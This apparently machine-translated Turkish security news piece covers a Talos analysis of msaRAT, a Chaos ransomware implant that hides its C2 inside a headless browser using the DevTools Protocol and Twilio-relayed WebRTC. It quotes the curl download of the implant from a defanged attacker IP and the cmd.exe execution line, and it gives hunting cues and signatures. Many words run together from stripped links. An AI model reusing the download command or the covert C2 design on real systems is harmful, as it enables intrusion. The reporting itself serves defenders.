The Kaos fidye yazılımı grubuKomuta ve kontrol sistemini kurbanın kendi tarayıcısı üzerinden çalıştırdı. Perşembe günü Cisco Talosayrıntılı msaRATArkasındaki Rust implantı, güvenliği ihlal edilmiş bir Windows makinesinde şifreleyicinin önünde bulundu.
İmplant hiçbir zaman kendi başına giden bir bağlantıyı açmaz. Süreci konuşuyor127.0.0.1ve başka hiçbir şey yok. Chrome veya Edge'i başsız modda başlatır ve tarayıcıyı, tarayıcının kendi hata ayıklama API'si olan Chrome DevTools Protokolü üzerinden yönlendirir.
Her C2 mesajı oradan Twilio'nun TURN hizmeti tarafından aktarılan bir WebRTC veri kanalı üzerinden gönderilir, dolayısıyla savunmacının kabloda gördüğü şey Cloudflare ve Twilio'yu çağıran bir tarayıcıdır. Saldırganın kendi sunucu adresi hiçbir zaman görünmez.
Chrome Konuşuyor
msaRAT, önce ortam değişkenleri aracılığıyla Chrome veya Edge'i arar, ardından Chrome kayıt defterine geri döner. Eşleşen bir tarayıcı bulunamazsa CDP yolu atlanır.
Bir tane bulduğunda, tarayıcıyı görünür bir pencere olmadan başlatır.--headless=new, CDP'yi etkinleştirir--remote-debugging-portve onu ayrı bir noktaya işaret ediyor--user-data-dir.
O zamandan beriKrom 136, Google artık varsayılan profile karşı hata ayıklama anahtarını kabul etmiyor; bu değişiklik Mart 2025'te duyuruldu.Bilgi hırsızları çerez hırsızlığının bayrağını ele geçirdi. msaRAT kendi profil dizinini getirir, böylece değişiklik onu engellemez. Talos'un analizindeki hiçbir şey bunun kurbanın profiline dokunduğunu göstermiyor.
Kötü amaçlı yazılım soruyor/json/list/hata ayıklanabilir bir hedef için ve döndürülen WebSocket URL'sine bağlanır. Bir sekme oluşturur, İçerik Güvenliği Politikasını kapatır.Page.setBypassCSP, beş geri aramayı kaydederRuntime.addBindingve aramalarRuntime.evaluatedüz metin olarak saklanan JavaScript'i ikili dosyaya enjekte etmek için.rdatabölüm.
Dört geri arama adı,msaOpen, msaClose, msaError, VemsaMessage, Talos'a kötü amaçlı yazılımın adını verdi. BeşincisidataAck.
Bu JavaScript, STUN ve TURN yapılandırmasını şuradaki bir Cloudflare Çalışanından getiriyor:is-01-ast[.]ols-img-12[.]workers[.]dev, Microsoft'un sitesinden gelen trafik olarak gizlenen Origin ve Referer başlıklarıyla. Bir eş bağlantı kurar ve aynı uç noktaya bir SDP teklifi gönderir.
Cevap, ICE adayı olmadan ve bağlantı adresi olarak ayarlanmadan geliyor.0.0.0.0böylece doğrudan eşler arası bağlantı oluşamaz ve kanalın tamamı Twilio'nun aktarıcısı üzerinden çalışır.global.turn.twilio.com. Veri kanalı yayına girdikten sonra İşçi yolun dışına çıkar.
Bu kanaldaki trafik iki kez şifrelenir. Tarayıcı DTLS'yi yönetir ve içinde bir ECDH değişimi tarafından anahtarlanan ChaCha-Poly1305 tabanlı bir şema bulunur.0xFEBağlantının hemen ardından C2'den el sıkışma çerçevesi.
İmplant gelen komut çerçevelerini iletircmd.exe /e:ON /v:OFF /d /c <cmd>infaz için. Talos, ekran görüntüleri veya dosyalar gibi büyük yükleri güvenilir bir şekilde taşımak için oluşturulmuş olduğu düşünülen gönderme kuyruğunu ve akış kontrolünü okur.
Taşımanın yarısı da yeni değil.Praetorian Ağustos 2025'te gösterildikonferans platformlarının TURN altyapısının tam bir C2 kanalı taşıyabileceğini veSansec Mart 2026'da bir deniz süpürücüsü buldukullanarakÇalınan kart verilerini HTTP incelemesinden geçirmek için WebRTC veri kanalları.
msaRAT, her ikisini de CDP aracılığıyla başsız bir tarayıcıyı çalıştıran Kaos bağlantılı bir Rust implantının içine yerleştirir.
Giriş Yolu Her Zamankiyle Aynı
msaRAT, operatörün yürütmesi tamamlandıktan sonra ve şifreleyici çalıştırılmadan önce gelir. Talos bu makineye nasıl ulaşıldığını söylemiyor. Grubunbelgelenmiş taktik kitabıspam seli, vishing,Hızlı Yardımve kalıcılık için RMM araçları.
İmplantın kendisi tek bir kıvrılma komutuyla aşağı iner:
curl.exe http://172.86.126[.]18:443/update_ms.msi -o C:\programdata\update_ms.msi
Bağlantı noktası 443, düz HTTP. Protokol denetimi olmadan bağlantı noktası numaralarının etrafına yazılan güvenlik duvarı kuralları bunun geçmesine izin verir. MSI, bir Windows güncellemesinin kimliğine bürünen özellik verilerini taşır ve kurulumun sonunda, yerleşik bir DLL dosyasını doğrudan belleğe yüklemek için özel bir eylem tetiklenir.
Bu DLL msaRAT'tır: Tokio eşzamansız çalışma zamanında Rust'ta yazılmıştır ve adlı bir işlevi dışa aktarmaktadır.RUNKurulumcunun araması için.
Av Notları
msaRAT, güvenlik ihlali sonrası kötü amaçlı yazılımdır ve Chrome veya Edge güvenlik açığına bağlı değildir; dolayısıyla savunucuların, tekniğin kendisi için uygulayabilecekleri bir tarayıcı yaması yoktur.
Kalıcı olan sinyal süreç davranışıdır. Talos'un belirttiği gibi, "tüm harici iletişimlerin meşru bir tarayıcı işleminden kaynaklandığı gözlemleniyor." Bir yükleyici, bir hizmet veya etkileşimli olmayan başka bir ana öğe tarafından--headless=new and --remote-debugging-port set.
ile başlatılan Chrome veya Edge'i Avlayın Daha sonra bu süreci, hata ayıklama bağlantı noktasına ve giden WebRTC'ye giden geridöngü trafiğiyle ilişkilendirin. Telemetrinin CDP mesajlarını yakaladığı yerde,Runtime.addBinding and Runtime.evaluatepivotlardır. Tarayıcı otomasyonunu veya CI'yi çalıştıran filoların, ayarlanacak kendi başsız işleri olacak.
23 Temmuz 2026 itibarıyla Talos, msaRAT için hiçbir dosya karması yayınlamadı. Genel gösterge kümesi, her ikisi deIOC deposundabulunan iki ağ yapısıdır; hazırlama IP'si ve Çalışan ana bilgisayar adı. Talos'un tespit kapsamı:
- ClamAV:
Win.Downloader.ChaosRaas-10060321-0 - Snort 2:
1:66839,1:66840,1:66841 - Snort 3:
1:66839,1:301587
Bu göstergeler kullanışlı ancak dardır. workers.dev is Cloudflare'in tüm İşçi hesaplarına verilen paylaşılan dağıtım alanıve saldırganlarbunu geçen yıl yükleri düzenlemek ve C2 tüneli oluşturmak için kullandılar.
Twilio, gerçek WebRTC uygulamalarının bağlı olduğu meşru bir STUN ve TURN hizmetini çalıştırıyor. Her ikisini de kuruluş düzeyinde engelleyin ve bunları kullanan herkesin çalışma trafiğini kesintiye uğratın. Talos, sinyal vermek için Cloudflare İşçilerinin seçilmesinin olası nedeni olarak bunu okuyor.
Bunu ölçülü bir kampanyadan ziyade gözlemlenen ticari zanaat olarak ele alın. Rapor, kurbanın kimliğini belirtmiyor, kaç kuruluşun msaRAT aldığını belirtmiyor, kötü amaçlı yazılımın ne zaman kullanıma girdiğini belirtmiyor veya Cloudflare Worker ve Twilio TURN kimlik bilgilerinin nasıl elde edildiğini açıklamıyor.
Teslimat dikkat çekici değil: kıvrılmış bir indirme, sahte bir Windows güncellemesi, bir MSI'dan yüklenen bir DLL. Değişen şey, C2'nin daha sonra nerede yaşayacağıdır ve Talos'un yayınladığı her iki gösterge de yarın değiştirilebilir. Bir yükleyici tarafından oluşturulan başsız bir tarayıcının taşınması daha zordur çünkü teknik budur.
msaRAT iki tarayıcıyı kontrol eder ve bunlardan birinin mevcut olmasını ve çıkışına izin verilmesini gerektirir. Windows filosunda bu zorlu bir gereklilik değildir.
